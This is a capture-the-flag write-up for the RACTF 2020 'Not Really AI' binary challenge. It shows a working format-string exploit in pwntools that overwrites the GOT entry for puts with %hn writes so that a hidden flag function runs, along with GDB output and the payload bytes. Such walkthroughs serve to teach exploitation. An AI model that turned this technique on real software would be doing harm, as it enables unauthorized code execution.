Tags: string-format binary pwn 


# RACTF 2020

## Not Really AI (binary)

### Description

> Exploit the service to get the flag.
> [nra]

200 points

### Solution Summary

Exploit format string vulnerability
to overwrite GOT [2](https://ropemporium.com/guide.html#Appendix%20A) and
redirect code execution so that _flaggy_ function is executed.

### Walkthrough

The binary is a 32bits file with no protection.

$ pwn checksec nra
Arch: i386-32-little
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments

The program read some user data but there isn't buffer overflow.

$ ./nra
How are you finding RACTF?
bla <= READ DATA
I am glad you
bla <= PRINT IT

We hope you keep going!

However it prints the input data in an insecurely way leading to format string

printf@plt (
[sp + 0x0] = 0xffffd210 → "my input data\n",
[sp + 0x4] = 0x00000200

And there is a call to _puts_ after that, so you can replace the address of
_puts_ in GOT by the address of _flaggy_ function. This way _flaggy_ will be
executed when program calls _puts_.

=> 0x08049225 <+99>: call 0x8049030 <printf@plt>
0x0804922a <+104>: add esp,0x10
0x0804922d <+107>: sub esp,0xc
0x08049230 <+110>: lea eax,[ebx-0x1fcf]
0x08049236 <+116>: push eax
0x08049237 <+117>: call 0x8049060 <puts@plt>


You can get the address of _flaggy_ function and GOT entries using GDB:

gef➤ b * main
gef➤ run
gef➤ print flaggy
$3 = {<text variable, no debug info>} 0x8049245 <flaggy>
gef➤ got

GOT protection: Partial RelRO | GOT functions: 8

[0x804c018] puts@GLIBC_2.0 → 0x8049066


### Exploit

First of all you have to find the offset in stack to the string you provide as
input data. Using `AAAA%N$x` as input data, where `N` is number that will be
incremented in a loop. When program prints `41414141` (`AAAA` in hex) you find
the right position.

from pwn import *

context.log_level = 'error'

for i in range(10):
sh = process('./nra')
print(f'%{i}$x', sh.readline().decode()[4:], end='')

Looking at the output you find `41414141` when `N` is `4`. So you can refer to
the first four bytes using `4$` in format string.

%0$x %0$x
%1$x 200
%2$x f7f2b5c0
%3$x 80491d1
%4$x 41414141
%5$x 78243525
%6$x a2e5000a
%7$x f7fa5198
%8$x 0
%9$x f7f923ec

Now you can use the memory address of where you want to write as first four
bytes followed by a format string who will write the address of _flaggy_

I start with the follow payload, but the program output is so long that it only
works locally. Connection to the CTF server is droped before flag is printed.

payload = p32(0x0804c018) # elf.got['puts']
payload += b'aaaaa%134517308d%4$n' # %4$n writes 0x08049245 (address of flaggy function)

By using length modifier, you are able to control the amount of data written by
the `%n` formatter, so you can write a byte, two-bytes, four-bytes and so on.
I decide to write two-bytes (halt address) in `0x0804c018` and two-bytes (the
other halt) in `0x0804c018 + 2`, this way the program output is smaller and I
get the flag.

payload = p32(0x0804c018) # elf.got['puts']
payload += p32(0x0804c01a) # elf.got['puts'] + 2
payload += b'%2044d%5$hn' # writes 0x0804
payload += b'%35393d%4$hn' # writes 0x9245

The final exploit was:

from pwn import *

payload = p32(0x0804c018) # elf.got['puts']
payload += p32(0x0804c01a) # elf.got['puts'] + 2
payload += b'%2044d%5$hn' # writes 0x0804
payload += b'%35393d%4$hn' # writes 0x9245

#sh = process('./nra')
sh = remote('', 62051)

Original writeup (https://gitlab.com/rogeriobastos/ctf-write-ups/-/blob/master/2020/RACTF/binary/Not_Really_AI/README.md).